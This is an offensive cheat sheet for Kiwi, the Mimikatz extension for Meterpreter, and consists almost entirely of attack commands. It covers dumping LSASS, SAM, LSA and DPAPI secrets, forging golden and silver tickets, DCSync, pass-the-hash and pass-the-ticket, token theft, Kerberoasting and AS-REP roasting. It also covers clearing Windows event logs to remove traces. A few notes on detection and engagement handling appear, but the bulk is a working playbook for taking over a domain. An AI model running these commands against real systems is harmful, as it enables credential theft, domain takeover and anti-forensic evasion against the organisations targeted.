Kiwi (Mimikatz for Meterpreter)
Kiwi is the Meterpreter extension that embeds Mimikatz in a live session. It dumps credentials from LSASS memory, dumps the SAM and LSA secrets, lists, exports and injects Kerberos tickets, forges golden tickets and runs DCSync; its kiwi_cmd passthrough accepts any native Mimikatz command for everything the wrapper commands do not cover.
Loading Kiwi Module
# Kiwi needs a native Meterpreter whose architecture matches the OS (x64 on x64 Windows)
# and a session with local admin rights so SeDebugPrivilege can be enabled
meterpreter > getsystem
meterpreter > load kiwi
# Verify the extension loaded: help now lists a "Kiwi Commands" section
meterpreter > help
# Run a raw Mimikatz command through the extension
meterpreter > kiwi_cmd "privilege::debug"
Credential Dumping Commands
All Credentials
# Dump everything Kiwi can read from LSASS memory (msv, wdigest, kerberos, tspkg, ssp)
meterpreter > creds_all
# Output is one table per provider with Username / Domain / NTLM (or Password) / SHA1 columns;
# results are also written to the Metasploit database (msf > creds)
Per-Provider Dumps
# Cleartext from WDigest (only if UseLogonCredential=1; off by default since Windows 8.1 / Server 2012 R2)
meterpreter > creds_wdigest
# Cleartext from the TsPkg SSP (RDP single sign-on)
meterpreter > creds_tspkg
# Cleartext from the SSP package (e.g. runas /netonly credentials)
meterpreter > creds_ssp
# Credentials held by the Kerberos package
meterpreter > creds_kerberos
# Check whether WDigest cleartext caching is enabled before relying on it
meterpreter > reg queryval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential
NTLM Hashes
# NTLM and SHA1 hashes of logged-on users from the MSV package
meterpreter > creds_msv
# Dump the local SAM in place (requires SYSTEM; no file copy needed)
meterpreter > lsa_dump_sam
# Alternative: export the hives and parse them offline
meterpreter > shell
> reg save HKLM\SAM C:\Temp\SAM
> reg save HKLM\SYSTEM C:\Temp\SYSTEM
> reg save HKLM\SECURITY C:\Temp\SECURITY
> exit
meterpreter > download C:\\Temp\\SAM /tmp/SAM
meterpreter > download C:\\Temp\\SYSTEM /tmp/SYSTEM
meterpreter > download C:\\Temp\\SECURITY /tmp/SECURITY
# Then use secretsdump.py offline (SECURITY adds LSA secrets and cached domain logons)
# secretsdump.py -sam /tmp/SAM -system /tmp/SYSTEM -security /tmp/SECURITY LOCAL
Kerberos Tickets
# List Kerberos tickets in the current logon session
meterpreter > kerberos_ticket_list
# Export every ticket LSASS holds (all logon sessions) as .kirbi files in the process's working directory on the target
meterpreter > kiwi_cmd "sekurlsa::tickets /export"
# Pull an exported ticket back to the Metasploit host
meterpreter > download <exported_ticket>.kirbi /tmp/ticket.kirbi
# Inject a ticket into the current session (pass-the-ticket); the path is on the Metasploit host and no base64 step is involved
meterpreter > kerberos_ticket_use /tmp/ticket.kirbi
# Remove all tickets from the current session
meterpreter > kerberos_ticket_purge
Kerberos Ticket Forging
Golden Ticket Attack
# Needs the domain SID and the krbtgt NTLM hash; the hash only exists on a domain controller (DCSync or NTDS.dit)
# Get the domain SID: take the user SID from whoami /user and drop the trailing RID
meterpreter > shell
> whoami /user
# S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-1001  -> domain SID is S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX
> exit
# Get the krbtgt hash with DCSync (requires a session or token with replication rights, e.g. Domain Admin)
meterpreter > dcsync_ntlm EXAMPLE\krbtgt
# Forge the ticket; -t is an output path on the Metasploit host, -i the user RID, -g the group RIDs (512 = Domain Admins)
meterpreter > golden_ticket_create -d example.com -u Administrator -s S-1-5-21-xxx -k <krbtgt_ntlm> -i 500 -g 512,513,519 -t /tmp/golden.tck
# Inject it into the current logon session
meterpreter > kerberos_ticket_use /tmp/golden.tck
# Equivalent raw Mimikatz form (kerberos::golden is a Mimikatz command, not a cmd.exe one), injected directly with /ptt
meterpreter > kiwi_cmd "kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-xxx /krbtgt:<krbtgt_ntlm> /ptt"
# Confirm the ticket is present
meterpreter > kerberos_ticket_list
Silver Ticket Attack
# The key for a service SPN is the NTLM hash of the account that owns the SPN; for cifs/host on a server that is the
# computer account (FILESERVER$), so read it from that server's LSASS or via DCSync, not from a random service account
meterpreter > creds_msv
# Look for DOMAIN\FILESERVER$ (or DOMAIN\svc_account for a user-owned SPN) and its NTLM
# Mimikatz has no kerberos::silver: a silver ticket is kerberos::golden with /target and /service, and the service key in /rc4
# (use /aes256 when the account only has AES keys)
meterpreter > kiwi_cmd "kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-xxx /target:fileserver.example.com /service:cifs /rc4:<svc_ntlm> /ptt"
# Use it from a shell; address the server by FQDN, not IP, so SMB negotiates Kerberos instead of falling back to NTLM
meterpreter > shell
> dir \\fileserver.example.com\share
> exit
LSA Attacks
LSA Dump
# Dump LSA secrets (requires SYSTEM)
meterpreter > getsystem
meterpreter > lsa_dump_secrets
# Output includes:
# - $MACHINE.ACC (computer account password; silver tickets, and DCSync if the host is a DC)
# - DPAPI_SYSTEM (system-wide DPAPI keys)
# - NL$KM (key that encrypts the cached domain logons)
# - _SC_<service> entries (cleartext passwords of services running as domain accounts)
# - DefaultPassword (AutoLogon password when it was stored as an LSA secret rather than in the registry)
# Local account hashes come from the SAM, not from the secrets
meterpreter > lsa_dump_sam
Domain Cached Credentials (DCC)
# Dump cached domain logons (DCC2 / mscash2 on Vista and later; requires SYSTEM)
meterpreter > kiwi_cmd "lsadump::cache"
# DCC2 is PBKDF2-HMAC-SHA1 (10240 rounds) over MD4-derived material, salted with the lowercase username:
# not usable for pass-the-hash, offline cracking only
# hashcat -m 2100 format: $DCC2$10240#username#hash   (the older DCC1 is -m 1100)
DPAPI Master Keys
# List master keys already decrypted in LSASS memory (GUID -> key)
meterpreter > kiwi_cmd "sekurlsa::dpapi"
# Decrypt a user's master key file with their password (file lives in %APPDATA%\Microsoft\Protect\<SID>\<GUID>)
meterpreter > kiwi_cmd "dpapi::masterkey /in:C:\Temp\<GUID> /sid:<user_sid> /password:<password>"
# Decrypt a Credential Manager file or a generic DPAPI blob with a known master key
meterpreter > kiwi_cmd "dpapi::cred /in:C:\Temp\<credfile> /masterkey:<masterkey_hex>"
meterpreter > kiwi_cmd "dpapi::blob /in:C:\Temp\<blob> /masterkey:<masterkey_hex>"
# From a domain-admin context the domain backup key decrypts every user's master keys without their password
meterpreter > kiwi_cmd "lsadump::backupkeys /system:dc01.example.com /export"
Session Management
Pass-the-Hash (PTH)
# Extract NTLM hash
meterpreter > creds_msv
# Output: Username / Domain / NTLM columns, e.g. user  DOMAIN  <ntlmhash>
# Spawn a process whose network logons use the hash (pth is not a Meterpreter command; local whoami still shows the original user)
meterpreter > kiwi_cmd "sekurlsa::pth /user:user /domain:DOMAIN /ntlm:<ntlmhash> /run:cmd.exe"
# That cmd.exe runs on the target's desktop, not inside the session; from Metasploit it is easier to pass the hash to the psexec module
msf > use exploit/windows/smb/psexec
msf > set SMBUser user
msf > set SMBDomain DOMAIN
msf > set SMBPass aad3b435b51404eeaad3b435b51404ee:<ntlmhash>
msf > set RHOSTS target
msf > run
Pass-the-Ticket (PTT)
# Export the TGT from LSASS (all logon sessions) as .kirbi files on the target
meterpreter > kiwi_cmd "sekurlsa::tickets /export"
# Pull the TGT back to the Metasploit host (the krbtgt-named file)
meterpreter > download <exported_tgt>.kirbi /tmp/tgt.kirbi
# Import into another session; kerberos_ticket_use reads the .kirbi from the Metasploit host, no manual base64 step
meterpreter > kerberos_ticket_use /tmp/tgt.kirbi
# Verify the ticket is in the session, then authenticate to a network service by name
meterpreter > kerberos_ticket_list
meterpreter > shell
> dir \\fileserver.example.com\share
> exit
Token Management
Impersonation
# Current identity
meterpreter > getuid
# List tokens available to the session (incognito; delegation tokens need SeImpersonatePrivilege)
meterpreter > load incognito
meterpreter > list_tokens -u
# Impersonate a listed user
meterpreter > impersonate_token "DOMAIN\\user"
# Or steal the primary token of a process already running as the target user
meterpreter > steal_token <pid>
# Processes spawned now inherit the impersonated token
meterpreter > execute -f cmd.exe -i -t
# Revert to the original token
meterpreter > rev2self
Token Use for Lateral Movement
# psexec is not a Meterpreter command; from msfconsole use the module with captured creds or an LM:NTLM hash
msf > use exploit/windows/smb/psexec
msf > set RHOSTS target
msf > set SMBUser user
msf > set SMBPass <password or LM:NTLM>
msf > run
# runas prompts for the password on the console and hangs in a non-interactive shell; use sekurlsa::pth or psexec instead
Registry Credential Dumping
RDP Credentials
# The Terminal Server Client keys only store connection history and username hints, not passwords
meterpreter > shell
> reg query "HKCU\Software\Microsoft\Terminal Server Client\Default"
> reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
# Saved RDP passwords live in Credential Manager (DPAPI-protected); list the entries, then decrypt with dpapi::cred
> cmdkey /list
> exit
AutoLogin
# Check for AutoLogon credentials (DefaultPassword is only present if it was stored in cleartext)
meterpreter > shell
> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon
> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
> exit
# If AutoAdminLogon is 1 but DefaultPassword is absent, the password is the DefaultPassword LSA secret (lsa_dump_secrets)
VNC Credentials
# Extract the stored VNC server password (RealVNC 4.x per-user key; the service-mode key is under HKLM)
meterpreter > shell
> reg query "HKCU\Software\RealVNC\VNC4" /v Password
> reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v Password
> exit
# The value is not a hash: it is DES-obfuscated with a fixed, public key and decodes offline
Active Directory Attacks
AS-REP Roasting
# Targets accounts with "Do not require Kerberos preauthentication" set; Rubeus must be on the target (upload it or use a .NET loader)
meterpreter > upload /path/to/Rubeus.exe C:\\Temp\\Rubeus.exe
meterpreter > execute -f C:\\Temp\\Rubeus.exe -a "asreproast /format:hashcat /outfile:C:\\Temp\\asrep.txt" -i
meterpreter > download C:\\Temp\\asrep.txt /tmp/asrep.txt
# Offline crack with hashcat (etype 23 AS-REP)
# hashcat -m 18200 /tmp/asrep.txt wordlist.txt
Kerberoasting
# Find targetable SPNs first: only SPNs owned by user accounts are worth cracking (computer-account passwords are random)
meterpreter > shell
> setspn -T example.com -Q */*
> exit
# Request service tickets
meterpreter > execute -f C:\\Temp\\Rubeus.exe -a "kerberoast /format:hashcat /outfile:C:\\Temp\\krb.txt" -i
meterpreter > download C:\\Temp\\krb.txt /tmp/krb.txt
# Crack extracted hashes: -m 13100 for RC4 (etype 23), -m 19700 for AES256 (etype 18)
# hashcat -m 13100 /tmp/krb.txt wordlist.txt
DCSync
Rogue Domain Replication
# Requires a security context holding DS-Replication-Get-Changes and -Get-Changes-All on the domain
# (Domain Admins by default), obtained via PTH/PTT or token impersonation; lsadump::dcsync is a Mimikatz command, not a shell one
meterpreter > dcsync_ntlm EXAMPLE\krbtgt
# Full replication output (NTLM and AES keys plus password history)
meterpreter > dcsync EXAMPLE\krbtgt
# Raw Mimikatz form
meterpreter > kiwi_cmd "lsadump::dcsync /domain:example.com /user:krbtgt"
# Yields the krbtgt keys for golden tickets; every call logs a 4662 event on the DC carrying the replication GUIDs
Data Exfiltration
Credentials to File
# Kiwi output is printed on the Metasploit host, not on the target, so redirecting inside shell captures nothing;
# record it with spool before running the dump
meterpreter > background
msf > spool /tmp/creds.txt
msf > sessions -i 1
meterpreter > creds_all
meterpreter > background
msf > spool off
# Kiwi also writes what it finds into the Metasploit database
msf > creds
Selective Credential Export
# creds_all output carries no group membership, so "Domain Admins" cannot be filtered from it;
# resolve the group first, then filter by user
meterpreter > shell
> net group "Domain Admins" /domain
> exit
msf > creds -u Administrator
# NT hashes only
msf > creds -t ntlm
Cleanup
Event Log Clearing
# Meterpreter's built-in clears Application, System and Security in one go
meterpreter > clearev
# Equivalent from a shell
meterpreter > shell
> wevtutil cl System
> wevtutil cl Security
> wevtutil cl Application
> exit
# Clearing the Security log writes event 1102 (104 for the other logs) and cannot remove copies already forwarded to a SIEM;
# an empty log is a stronger indicator than the events it held
Process and Artifact Cleanup
# Kill only the helper processes this session spawned (cmd.exe from execute, Rubeus, sekurlsa::pth children)
meterpreter > ps
meterpreter > kill <pid>
# NOTE: never kill lsass itself; the host reboots and the session dies
# Remove hive exports, dropped tools and injected tickets
meterpreter > rm C:\\Temp\\SAM
meterpreter > rm C:\\Temp\\SYSTEM
meterpreter > kerberos_ticket_purge
Troubleshooting
# Check identity and held privileges; SeDebugPrivilege is what Kiwi needs to open LSASS
meterpreter > getuid
meterpreter > getprivs
# If not SYSTEM, escalate
meterpreter > getsystem
meterpreter > getuid
# Verify the extension loaded: help lists the Kiwi commands
meterpreter > help
# "Handle on memory (0x00000005)" from sekurlsa means LSASS is a protected process (RunAsPPL); Kiwi cannot read it without a driver
# Empty msv/wdigest tables with no error usually mean Credential Guard is isolating the secrets
meterpreter > reg queryval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa -v RunAsPPL
# Architecture mismatch (x86 Meterpreter on x64 Windows) breaks Kiwi: migrate to a 64-bit process and reload
meterpreter > migrate <x64_pid>
meterpreter > load kiwi
Security Considerations
- Needs local admin plus SeDebugPrivilege (getsystem provides both); SYSTEM alone does not help once LSASS is protected
- LSA Protection (RunAsPPL) denies the LSASS handle and Credential Guard leaves the credential tables empty; both are enabled by default on Windows 11 22H2 and later on eligible hardware
- WDigest cleartext is off by default since Windows 8.1 / Server 2012 R2 (UseLogonCredential); cleartext passwords usually only appear on older or deliberately weakened hosts
- Defender and most EDRs flag Mimikatz behaviour: LSASS handle opens with read access (Sysmon event 10), the Kiwi DLL in memory, and ticket injection
- Cleartext passwords pulled from memory are live credentials of real people; handle and store them under the engagement's data-handling rules
- A UAC bypass is only needed when the session is a split-token admin; SYSTEM via getsystem or a service context is already past UAC
Alternatives to Kiwi
# Invoke-Mimikatz via the Meterpreter PowerShell extension
meterpreter > load powershell
meterpreter > powershell_import /path/to/Invoke-Mimikatz.ps1
meterpreter > powershell_execute "Invoke-Mimikatz -Command '\"lsadump::sam\"'"
# Rubeus (C# Kerberos toolkit): execute-assembly is a Cobalt Strike command, not a Meterpreter one; upload and run the binary, or use the .NET loader module
meterpreter > execute -f C:\\Temp\\Rubeus.exe -a kerberoast -i
msf > use post/windows/manage/execute_dotnet_assembly
# SharpKatz (C# port of Mimikatz's sekurlsa/lsadump logic), run the same way
meterpreter > execute -f C:\\Temp\\SharpKatz.exe -a "--Command logonpasswords" -i
Best Practices
- Get SYSTEM (or at least SeDebugPrivilege) and check RunAsPPL / Credential Guard before the first dump, so a failed LSASS open is not mistaken for a Kiwi bug
- Do not try to disable AV/EDR for a credential dump; that is louder than the dump itself, and an in-memory extension inside an already-allowed process is the quiet path
- Prefer ticket operations over NTLM pass-the-hash where Kerberos works; they leave fewer 4624 type 3/9 artefacts on member servers
- Expect every action to leave something: 4662 for DCSync, 4769 RC4 tickets for Kerberoasting, 1102 when logs are cleared; clearing logs is a deliberate, noisy choice, not routine hygiene
- Purge injected tickets (kerberos_ticket_purge), drop impersonated tokens (rev2self) and remove hive exports and tool binaries when done
- Record harvested credentials with spool or the Metasploit database rather than in files on the target, and destroy them at engagement end